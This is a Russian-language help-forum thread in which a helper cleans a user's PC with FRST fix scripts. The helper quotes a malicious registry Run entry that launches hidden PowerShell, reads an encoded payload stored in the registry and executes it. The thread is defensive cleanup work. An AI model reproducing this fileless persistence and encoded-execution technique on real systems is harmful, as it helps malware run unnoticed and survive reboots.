Александр-l
Новый пользователь
- Сообщения
- 28
- Реакции
- 4
Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: Эта возможность может быть недоступна в некоторых браузерах.
Start::
CloseProcesses:
AV: Dr.Web Security Space (Enabled - Up to date) {250CDD7E-926B-AEFC-24F0-E203A6F6D244}
Reboot:
End::
HKU\S-1-5-21-1733455978-3607855058-934629134-1001\...\Run: [Viewines] => c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [424448 2025-03-24] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ
HKU\S-1-5-21-1733455978-3607855058-934629134-1001\Environment: [Vr9] powershell.exe <==== ВНИМАНИЕ
Эти записи не известны.Эти записи Powershell в автозагрузке вам известны?
Start::
CloseProcesses:
SystemRestore: On
CreateRestorePoint:
ExportKey: HKEY_USERS\S-1-5-21-1733455978-3607855058-934629134-1001\Software\Microsoft\Windows\CurrentVersion\Run
ExportKey: HKEY_USERS\S-1-5-21-1733455978-3607855058-934629134-1001\Environment
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
HKU\S-1-5-21-1733455978-3607855058-934629134-1001\...\Run: [Viewines] => c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [424448 2025-03-24] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ
HKU\S-1-5-21-1733455978-3607855058-934629134-1001\Environment: [Vr9] powershell.exe <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ
Reboot:
End::
А она какой-то конкретный код пыталась выполнить? (Думаю, отправлю эту тему с лечением в техподдержку тоже)Здесь нет файлов, здесь команда Powershell прописанная на запуск в реестре.
[HKEY_USERS\S-1-5-21-1733455978-3607855058-934629134-1001\Software\Microsoft\Windows\CurrentVersion\Run]
"Viewines"="%Vr9% -w 1 $elfe=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Ostalgi;%Vr9% -encodedcommand($elfe)"
[HKEY_USERS\S-1-5-21-1733455978-3607855058-934629134-1001\Environment]
"Vr9"="powershell.exe"
Что ответила ТП?отправлю эту тему с лечением в техподдержку тоже